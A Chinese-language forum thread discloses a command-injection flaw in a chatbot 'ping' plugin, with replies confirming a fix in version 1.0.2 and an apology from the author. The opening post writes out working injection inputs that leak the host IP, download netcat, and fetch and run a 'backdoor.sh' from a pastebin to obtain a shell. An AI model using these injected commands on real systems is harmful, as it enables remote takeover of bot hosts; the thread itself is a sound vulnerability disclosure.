ping 插件有被注入的风险，目前可以拿到bot所在机器的shell

jingming295 · 2023 年10 月 14 日 14:46

使用 ping插件，将会有被注入的风险

获取bot的真正ip地址

ping <(curl ip.sb)

8407e2c3b2365904a73ee8ff0bcd1c1b979c4141

尝试下载文件

ping <(wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz)

然后尝试解压

ping <(tar -xvzf netcat-0.7.1.tar.gz)

拿到shell

ping <(wget https://pastebin.theresa.cafe/get/2e9d536ea82a -O backdoor.sh)
ping <(chmod +x backdoor.sh)
ping <(./backdoor.sh)
ping <(bash ./backdoor.sh)

shigma · 2023 年10 月 14 日 14:52

这是非常严重的漏洞，希望插件作者予以重视。官方将可能标记此插件为不安全。

ilharp · 2023 年10 月 14 日 14:56

啊？

看来我需要暂时光速卸载此插件了

已卸载

ilharp · 2023 年10 月 14 日 15:11

已联系论坛管理并隐藏了帖子的编辑历史记录

MaikoTan · 2023 年10 月 15 日 04:00

According to the git log, this vulnerability should be already fixed. Can you try it again?

根据git log来看，这个漏洞应该已经被修复了。你可以再次试试它吗？

jingming295 · 2023 年10 月 15 日 10:23

目前看来已经被修复了

jingming295 · 2023 年10 月 15 日 10:27

更新的 ping 1.0.2，作者加了一些正则匹配，测试了以后目前没有发现有能够注入的情况了

ilharp · 2023 年10 月 15 日 16:09

这是好的，我可以安装回来了

flymyd · 2023 年10 月 16 日 01:39

自我检讨，下班前几分钟的粪作忽略了安全性问题，任何调用shell的命令都应该被慎重对待